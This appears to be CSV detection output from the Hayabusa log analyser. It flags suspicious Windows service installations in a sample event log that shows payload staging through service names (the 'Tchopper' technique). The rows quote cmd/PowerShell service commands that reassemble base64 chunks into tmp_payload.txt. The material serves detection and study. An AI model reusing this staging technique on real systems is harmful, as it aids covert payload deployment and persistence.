2021-11-03 17:19:06.043 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 0iICsgJChnZXQtZGF0ZSAtZiB5eXl5TU1kZGhobW1zcykgKyAiLmNzdiIgICAgICAgICAgICANCiAgICAgICAgICAgICAgICANCiAgICAgICAgV3JpdGUtTG9nICRJTkZPX0xPRyAiRXhwb3J0aW5n | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg160"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:06.043 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 0iICsgJChnZXQtZGF0ZSAtZiB5eXl5TU1kZGhobW1zcykgKyAiLmNzdiIgICAgICAgICAgICANCiAgICAgICAgICAgICAgICANCiAgICAgICAgV3JpdGUtTG9nICRJTkZPX0xPRyAiRXhwb3J0aW5n | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg160"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:07.496 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: IExvZyBFdmVudHMgdG86ICRFeHBvcnRMb2NhdGlvbiINCg0KICAgICAgICAkT3V0cHV0VGFibGUgfCBFeHBvcnQtQ1NWICRFeHBvcnRMb2NhdGlvbiAtTm9UeXBlSW5mb3JtYXRpb24gLUZvcmNlDQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg161"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:07.496 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IExvZyBFdmVudHMgdG86ICRFeHBvcnRMb2NhdGlvbiINCg0KICAgICAgICAkT3V0cHV0VGFibGUgfCBFeHBvcnQtQ1NWICRFeHBvcnRMb2NhdGlvbiAtTm9UeXBlSW5mb3JtYXRpb24gLUZvcmNlDQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg161"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:07.496 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IExvZyBFdmVudHMgdG86ICRFeHBvcnRMb2NhdGlvbiINCg0KICAgICAgICAkT3V0cHV0VGFibGUgfCBFeHBvcnQtQ1NWICRFeHBvcnRMb2NhdGlvbiAtTm9UeXBlSW5mb3JtYXRpb24gLUZvcmNlDQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg161"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:08.937 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ogICAgDQogICAgfQ0KDQogICAgY2F0Y2ggew0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJVbmFibGUgdG8gRXhwb3J0IExvZyBSZXBvcnQiDQoNCiAgICAgICAgV3JpdGUtTG9nICRF | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg162"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:08.937 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ogICAgDQogICAgfQ0KDQogICAgY2F0Y2ggew0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJVbmFibGUgdG8gRXhwb3J0IExvZyBSZXBvcnQiDQoNCiAgICAgICAgV3JpdGUtTG9nICRF | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg162"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:08.937 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ogICAgDQogICAgfQ0KDQogICAgY2F0Y2ggew0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJVbmFibGUgdG8gRXhwb3J0IExvZyBSZXBvcnQiDQoNCiAgICAgICAgV3JpdGUtTG9nICRF | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg162"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:10.406 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: UlJPUl9MT0cgJEVycm9yWzBdDQoNCiAgICAgICAgJEVycm9yTGluZU51bWJlciA9ICRFcnJvclswXS5JbnZvY2F0aW9uSW5mby5zY3JpcHRsaW5lbnVtYmVyDQoNCiAgICAgICAgV3JpdGUtTG9nIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg163"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:10.406 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: UlJPUl9MT0cgJEVycm9yWzBdDQoNCiAgICAgICAgJEVycm9yTGluZU51bWJlciA9ICRFcnJvclswXS5JbnZvY2F0aW9uSW5mby5zY3JpcHRsaW5lbnVtYmVyDQoNCiAgICAgICAgV3JpdGUtTG9nIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg163"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:10.406 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: UlJPUl9MT0cgJEVycm9yWzBdDQoNCiAgICAgICAgJEVycm9yTGluZU51bWJlciA9ICRFcnJvclswXS5JbnZvY2F0aW9uSW5mby5zY3JpcHRsaW5lbnVtYmVyDQoNCiAgICAgICAgV3JpdGUtTG9nIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg163"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:11.900 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: RFUlJPUl9MT0cgIkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICBleGl0DQogICAgfQ0KfQ0KDQoNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg164"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:11.900 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RFUlJPUl9MT0cgIkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICBleGl0DQogICAgfQ0KfQ0KDQoNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg164"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:11.900 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RFUlJPUl9MT0cgIkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICBleGl0DQogICAgfQ0KfQ0KDQoNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg164"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:13.355 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIGdlbmVyYXRlIGEgRm9sZGVyIFNlbGVjdCBEaW | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg165"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:13.355 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIGdlbmVyYXRlIGEgRm9sZGVyIFNlbGVjdCBEaW | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg165"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:13.355 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIGdlbmVyYXRlIGEgRm9sZGVyIFNlbGVjdCBEaW | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg165"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:14.807 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: Fsb2cNCg0KI0BwYXJhbSAkRGVzY3JpcHRpb24gLT4gIFRoZSBEZXNjcmlwdGlvbiBvZiB0aGUgRGlhbG9nDQojQHBhcmFtICRSb290Rm9sZGVyICAtPiAgVGhlIGxvY2F0aW9uIHRoYXQgdGhlIGZv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg166"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:14.807 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Fsb2cNCg0KI0BwYXJhbSAkRGVzY3JpcHRpb24gLT4gIFRoZSBEZXNjcmlwdGlvbiBvZiB0aGUgRGlhbG9nDQojQHBhcmFtICRSb290Rm9sZGVyICAtPiAgVGhlIGxvY2F0aW9uIHRoYXQgdGhlIGZv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg166"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:14.807 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Fsb2cNCg0KI0BwYXJhbSAkRGVzY3JpcHRpb24gLT4gIFRoZSBEZXNjcmlwdGlvbiBvZiB0aGUgRGlhbG9nDQojQHBhcmFtICRSb290Rm9sZGVyICAtPiAgVGhlIGxvY2F0aW9uIHRoYXQgdGhlIGZv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg166"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:16.238 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: bGRlciBzZWxlY3Rpb24gYmVnaW5zDQoNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg167"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:16.238 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bGRlciBzZWxlY3Rpb24gYmVnaW5zDQoNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg167"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:16.238 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bGRlciBzZWxlY3Rpb24gYmVnaW5zDQoNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg167"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:17.691 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: MjIyMjIyMjIyMNCg0KZnVuY3Rpb24gR2V0LUZpbGVOYW1lIHsgcGFyYW0oJFJvb3RGb2xkZXIpIA0KICAgIA0KICAgIHRyeSB7DQogICAgDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cgPSBOZXct | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg168"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:17.691 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMjIyMNCg0KZnVuY3Rpb24gR2V0LUZpbGVOYW1lIHsgcGFyYW0oJFJvb3RGb2xkZXIpIA0KICAgIA0KICAgIHRyeSB7DQogICAgDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cgPSBOZXct | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg168"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:17.691 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMjIyMNCg0KZnVuY3Rpb24gR2V0LUZpbGVOYW1lIHsgcGFyYW0oJFJvb3RGb2xkZXIpIA0KICAgIA0KICAgIHRyeSB7DQogICAgDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cgPSBOZXct | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg168"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:19.164 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: T2JqZWN0IFN5c3RlbS5XaW5kb3dzLkZvcm1zLk9wZW5GaWxlRGlhbG9nDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cuaW5pdGlhbERpcmVjdG9yeSA9ICRSb290Rm9sZGVyDQogICAgICAgICAkT3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg169"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:19.164 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: T2JqZWN0IFN5c3RlbS5XaW5kb3dzLkZvcm1zLk9wZW5GaWxlRGlhbG9nDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cuaW5pdGlhbERpcmVjdG9yeSA9ICRSb290Rm9sZGVyDQogICAgICAgICAkT3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg169"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:19.164 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: T2JqZWN0IFN5c3RlbS5XaW5kb3dzLkZvcm1zLk9wZW5GaWxlRGlhbG9nDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cuaW5pdGlhbERpcmVjdG9yeSA9ICRSb290Rm9sZGVyDQogICAgICAgICAkT3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg169"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:20.628 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: BlbkZpbGVEaWFsb2cuVGl0bGUgPSAiU2VsZWN0IENvbXB1dGVyIExpc3QiDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cuZmlsdGVyID0gIkFsbCBmaWxlcyAoKi4qKXwgKi4qIg0KICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg170"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:20.628 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: BlbkZpbGVEaWFsb2cuVGl0bGUgPSAiU2VsZWN0IENvbXB1dGVyIExpc3QiDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cuZmlsdGVyID0gIkFsbCBmaWxlcyAoKi4qKXwgKi4qIg0KICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg170"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:20.628 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: BlbkZpbGVEaWFsb2cuVGl0bGUgPSAiU2VsZWN0IENvbXB1dGVyIExpc3QiDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cuZmlsdGVyID0gIkFsbCBmaWxlcyAoKi4qKXwgKi4qIg0KICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg170"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:22.226 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: JE9wZW5GaWxlRGlhbG9nLlNob3dEaWFsb2coKSB8IE91dC1OdWxsDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cuZmlsZW5hbWUNCiAgICANCiAgICB9DQogICAgDQogICAgY2F0Y2ggew0KICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg171"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:22.226 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: JE9wZW5GaWxlRGlhbG9nLlNob3dEaWFsb2coKSB8IE91dC1OdWxsDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cuZmlsZW5hbWUNCiAgICANCiAgICB9DQogICAgDQogICAgY2F0Y2ggew0KICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg171"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:22.226 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: JE9wZW5GaWxlRGlhbG9nLlNob3dEaWFsb2coKSB8IE91dC1OdWxsDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cuZmlsZW5hbWUNCiAgICANCiAgICB9DQogICAgDQogICAgY2F0Y2ggew0KICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg171"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:19:23.680 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ANCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSB0byBTZWxlY3QgRmlsZSINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAgICAkRXJy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg172"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
